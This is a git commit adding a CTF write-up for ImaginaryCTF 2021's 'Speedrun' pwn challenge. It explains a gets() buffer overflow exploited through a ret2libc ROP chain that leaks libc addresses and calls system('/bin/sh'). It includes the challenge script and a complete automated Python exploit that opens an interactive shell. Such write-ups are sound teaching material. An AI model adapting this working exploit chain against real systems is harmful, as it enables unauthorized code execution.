path: root/docs/writeups
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authorMalfurious <>2021-07-28 10:18:00 -0400
committerMalfurious <>2021-08-01 18:41:37 -0400
commitff011e4759a4fb9cf761b1a344f560e7d0403614 (patch)
tree310143c491c0a687a2bc3da836aaed133a4aff52 /docs/writeups
parent576988b5b3902d509bdf12963d0149549023b1d1 (diff)
Add writeup for ImaginaryCTF 2021 / Speedrun
Signed-off-by: Malfurious <>
Diffstat (limited to '')
1 files changed, 380 insertions, 0 deletions
diff --git a/docs/writeups/ImaginaryCTF_2021/Speedrun.txt b/docs/writeups/ImaginaryCTF_2021/Speedrun.txt
new file mode 100644
index 0000000..a7b8283
--- /dev/null
+++ b/docs/writeups/ImaginaryCTF_2021/Speedrun.txt
@@ -0,0 +1,380 @@
+"I've seen some teams solve pwn challenges almost instantly. I'm sure y'all
+wonder how. Well, you're about to find out!"
+Category: pwn (200 points)
+Chall author: Eth007
+Writeup author: malfurious
+We are provided with a Python script, as well as an address to contact the
+vulnerable service over TCP/netcat. See Appendix A for the original script.
+See Appendix B for my automated solution.
+The Service
+We can see the service generates a very simple C program on the backend:
+int main(void) {
+ char inp[RANDOM_SIZE];
+ setvbuf(stdout,NULL,2,0);
+ setvbuf(stdin,NULL,2,0);
+ gets(inp); // <-- Vulnerable function
+ puts("Thanks!");
+Each time the script is run, this program is created with a random inp buffer
+size between 20 and 1000. The service then compiles the program and converts
+the binary file to base64 text to deliver to the user.
+After sending the executable to the user, the service runs it, redirecting all
+standard IO from the user into it. This is our opportunity to pwn the system.
+A short 10 second timer will interrupt the service and disconnect us if we are
+still connected. If we reconnect, we will be working with a brand new binary,
+so the exploit needs to be automated and occur during a single session.
+The Binary
+The binary is compiled for x86_64 and done so using -fno-stack-protector and
+-no-pie. Therefore, we shouldn't need to worry about stack canaries and can
+assume executable code address will be fixed. Some simple experimentation
+determined that ASLR is _probably_ enabled in the remote environment, so no such
+assumption can be made about most of the address space. Additionally, stack
+execution protection (NX) is in effect, so simple shellcode is off the table.
+After realizing shellcode was not going to be an option, there were two
+strategies I wanted to attempt to solve this problem. Both of them utilizing
+Return-oriented programming (ROP).
+First: Use a ROP chain to implement the original shellcode (or a variant of it).
+This prooved very difficult given our limited access to machine code in the
+main binary. There was one useful gadget found in the binary near the end of
+code under the __libc_csu_init symbol, at address 0x40120b; that being:
+ 5f pop $rdi
+ c3 ret
+The randomness to the main() function's buffer didn't affect the offset of these
+instructions, and since the code was not position-independent, the address was
+reliable. This gadget will come in handy for the soultion, since x86_64 uses
+the rdi register to pass the first argument to a function call.
+Second: Use a ROP chain to return to libc to call system("/bin/sh"). Due to
+ASLR, we had no relaible address of any system library code, but we could
+obtain them using a technique to leak libc addresses.
+Leaking libc
+We can leak the version of the libc running on the remote system by determining
+the relative offsets of a couple of its functions. We only have any sort of
+reference to a couple of functions, these being the ones actually called by the
+original program: setvbuf(), gets(), and puts().
+Although the runtime location of libc functions will be randomized due to ASLR,
+the PLT and GOT sections utilized directly by the executable will be fixed since
+it is compiled position-dependent.
+To leak the address of any function for which we have a PLT/GOT pair, we just
+need to call some print function with the address of the GOT section (which
+holds the dynamic address) as its argument *after* a call to said function has
+already occurred. We need to wait until after the first call, so that the GOT
+section's pointer can be initialized properly. In this case, we call puts(),
+since that is the only apropos function available.
+It was during working on this problem I learned about online libc databases.
+An example: Services like this one will allow you to
+give the observed addresses of two or more libc functions, and use their
+relative offsets to cross-reference which version of libc they must come from.
+With knowledge of the original libc build, one can simply lookup the offset of
+any other symbol or even download the version in question to perform additional
+analysis on their own.
+Dynamically-sized Payload
+We need to deal with the fact that the program is recompiled with a different
+buffer size each time we try to interact with it. My automated solution
+does this by decoding and disassembling the data it receives on start-up.
+ data = recv_bin(sock)
+ os.system(f"printf '{data}' | base64 -d >pyelf")
+ os.system(f"objdump -d pyelf | grep lea | sed '1q' > pyelf.ofs")
+ # produces ...
+ 401189: 48 8d 85 e0 fe ff ff lea -0x120(%rbp),%rax
+This just _happens_ to work in this case because the first lea instruction
+encountered in the binary is the one used to grab the buffer address for gets().
+From there I use a regex to grap the '120' offset value. This is the offset
+(in hex) from the start of the buffer to the base of the stack frame and is used
+later for payload generation.
+ROP Solution - part 1
+A preliminary attack was required to leak the libc version. The following ROP
+chain / payload was prepaired:
+ [padding] Enough data to fill space between start of inp buffer and the bottom of the stack frame
+ [saved rbp placeholder] An 8-byte value to be consumed by the leave instruction at the end of main()
+ (ret) 0x40120b Return address: Pointer to the "pop $rdi, ret" ROP gadget
+ 0x00404018 Value to pop into $rdi (Pointer to puts() GOT section)
+ (ret) 0x00401030 Return address: Pointer to puts() PLT - Effectively calling puts(&puts);
+ (ret) 0x40120b Return address: Pointer to the "pop $rdi, ret" ROP gadget
+ 0x00404028 Value to pop into $rdi (Pointer to setvbuf() GOT section)
+ (ret) 0x00401030 Return address: Pointer to puts() PLT - Effectively calling puts(&setvbuf);
+ "\n" Newline character to terminate input to C gets() function call in main()
+If this payload is fed into the service, the binary addresses of functions
+puts() and setvbuf() will be output after the "Thanks!" string. They can be
+used to lookup the libc in use.
+puts = 0x7f0443fcb910
+setvbuf = 0x7f0443fcbf90
+From this we can determine the following offsets from libc base:
+puts function = 0x071910
+system function = 0x0449c0
+"/bin/sh" string = 0x181519
+ASLR will randomize the location of libc base, but by re-leaking the address of
+puts() in followup attacks, we can use these known offsets to calculate full
+ROP Solution - part 2
+We are now ready to pwn the system. We need to prepare two payloads and get
+the binary to read them both separately since we need to re-leak the randomized
+puts() function address. So, the final step of the ROP chain for payload zero
+is to jump back to _start - to re-initialize the stack and run main() again.
+Here is the first payload: all fixed addresses were taken directly from the
+compiled binary.
+ [padding] Same junk data as before, possibly different length
+ [saved rbp placeholder] Same placeholder as before
+ (ret) 0x40120b Return address: Pointer to the "pop $rdi, ret" ROP gadget
+ 0x00404018 Value to pop into $rdi (Pointer to puts() GOT section)
+ (ret) 0x00401030 Return address: Pointer to puts() PLT - Effectively calling puts(&puts);
+ (ret) 0x00401060 Return address: Pointer to _start entry-point
+ "\n" Terminate input
+After sending this, the service prints the new address of puts() after the
+"Thanks!" string. We need to pause here to get this address to calculate
+addresses for system() and "/bin/sh". The program should have jumped back to
+main() and is ready for our second payload (within the same session).
+ [padding] Same junk data, required length same as previous in part 2
+ [saved rbp placeholder] Same placeholder
+ (ret) 0x40120b Return address: Pointer to the "pop $rdi, ret" ROP gadget
+ [binsh address] Value to pop into $rdi (Calculated pointer to "/bin/sh" string)
+ (ret) [system address] Return address: Calculated pointer to system() function - Calling system("/bin/sh")
+ "\n" Terminate input
+After sending this, the service has forked and dropped into a shell. The flag
+is in flag.txt
+ cat flag.txt
+ ictf{4ut0m4t1ng_expl0it_d3v????_b7d75e95}
+= Appendix A: =
+#!/usr/bin/env python3
+import os
+import sys
+import subprocess
+import base64
+import random
+import uuid
+import time
+code1 = '''
+#include <stdio.h>
+int main(void) {
+ char inp['''
+code2 = '''];
+ setvbuf(stdout,NULL,2,0);
+ setvbuf(stdin,NULL,2,0);
+ gets(inp);
+ puts("Thanks!");
+art = '''
+def compile(size):
+ filename = "/tmp/bin" + str(uuid.uuid4())
+ open(filename + ".c", "w").write(code1 + str(size) + code2)
+["gcc", "-o", filename, filename + ".c", "-fno-stack-protector", "-no-pie"], capture_output=True)
+ os.remove(filename + ".c")
+ return filename
+def handler(signum, frame):
+ print("Out of time!")
+filename = compile(random.randint(20,1000))
+binary = base64.b64encode(open(filename, "rb").read()).decode()
+print("I'll see you after you defeat the ender dragon!")
+print("---------------------------BEGIN DATA---------------------------")
+print("----------------------------END DATA----------------------------")
+[filename], stdin=sys.stdin, timeout=10)
+= Appendix B: =
+import socket
+import re
+import os
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
+s.connect(("", 42020))
+#' 401189: 48 8d 85 f0 fe ff ff lea -0x110(%rbp),%rax'
+p = re.compile('-0x(.*)\(%rbp\)')
+def pp(i):
+ return i.to_bytes(8, 'little')
+def gp(i):
+ return int.from_bytes(i, 'little', signed=False)
+def recv_pre(sock):
+ data = b''
+ while True:
+ data += sock.recv(20)
+ if b'-------' in data:
+ while True:
+ b = sock.recv(1)
+ data += b
+ if b == b'\n':
+ print(data.decode())
+ return
+def recv_bin(sock):
+ data = b''
+ while True:
+ b = sock.recv(1)
+ if b == b'\n':
+ print(" [[data consumed by the collective]]")
+ return data.decode()
+ data += b
+# automated re
+data = recv_bin(s)
+os.system(f"printf '{data}' | base64 -d >pyelf")
+os.system(f"objdump -d pyelf | grep lea | sed '1q' > pyelf.ofs")
+ofs = open("pyelf.ofs", "r").read()
+for x in p.findall(ofs):
+ ofs = int(x, 16)
+ break
+# finish recv
+# send payload
+rdi_gadget = 0x40120b
+puts_plt = 0x00401030
+puts_got = 0x00404018
+vbuf_plt = 0x00401050
+vbuf_got = 0x00404028
+_start = 0x00401060
+puts_ofs = 0x071910
+syst_ofs = 0x0449c0
+binsh_ofs = 0x181519
+# First payload
+payload = (b"A"*ofs) + (b"B"*8)
+payload += pp(rdi_gadget) # puts(&puts)
+payload += pp(puts_got)
+payload += pp(puts_plt)
+payload += pp(_start) # jmp _start
+payload += b"\n"
+get = s.recv(4096)
+get = get[8:-1] # strip 'Thanks!\n ... \n'
+leaked = gp(get)
+syst = leaked + syst_ofs - puts_ofs
+binsh = leaked + binsh_ofs - puts_ofs
+# Second payload
+payload = (b"A"*ofs) + (b"B"*8)
+payload += pp(rdi_gadget) # system("/bin/sh")
+payload += pp(binsh)
+payload += pp(syst)
+payload += b"\n"
+get = s.recv(4096)
+while True:
+ cmd = input() + "\n"
+ s.send(cmd.encode())
+ print(s.recv(4096))